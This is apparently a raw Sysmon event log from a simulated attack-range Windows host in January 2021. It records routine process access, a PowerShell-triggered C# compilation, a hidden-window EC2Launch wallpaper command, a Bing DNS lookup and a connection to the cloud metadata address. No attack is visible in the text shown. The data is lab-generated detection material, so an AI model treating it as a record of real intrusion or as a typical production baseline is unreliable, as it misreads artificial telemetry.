13:58:49.476{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.476{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.476{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.007{59A5CD1D-9418-6005-1905-00000000A301}63406376C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:58:50.726{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.dll2021-01-18 13:58:50.460 10341000x800000000000000013470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.663{59A5CD1D-941A-6005-1B05-00000000A301}67326728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.666{59A5CD1D-941A-6005-1C05-00000000A301}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESE498.tmp" "c:\Users\Administrator\AppData\Local\Temp\1xemtzqb\CSC6DC6EA1A7F3C4393BD2BABA6A13096BE.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.cmdline" 10341000x800000000000000013462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.507{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.507{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.507{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.491{59A5CD1D-9417-6005-1505-00000000A301}69963152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+2980(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+2980(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1f8357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6ec85466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e194997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1f2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+6e1d6644(wow64)|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+46fd1 154100x800000000000000013453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.467{59A5CD1D-941A-6005-1B05-00000000A301}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 11241100x800000000000000013452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.460{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.cmdline2021-01-18 13:58:50.460 11241100x800000000000000013451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:58:50.460{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\1xemtzqb\1xemtzqb.dll2021-01-18 13:58:50.460 10341000x800000000000000013474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:51.601{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a950|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:51.460{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:51.460{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.470{59A5CD1D-940F-6005-0C05-00000000A301}6476www.bing.com0type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 www-bing-com.dual-a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:53.476{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000013479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:50.846{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local65515-false169.254.169.254-80http 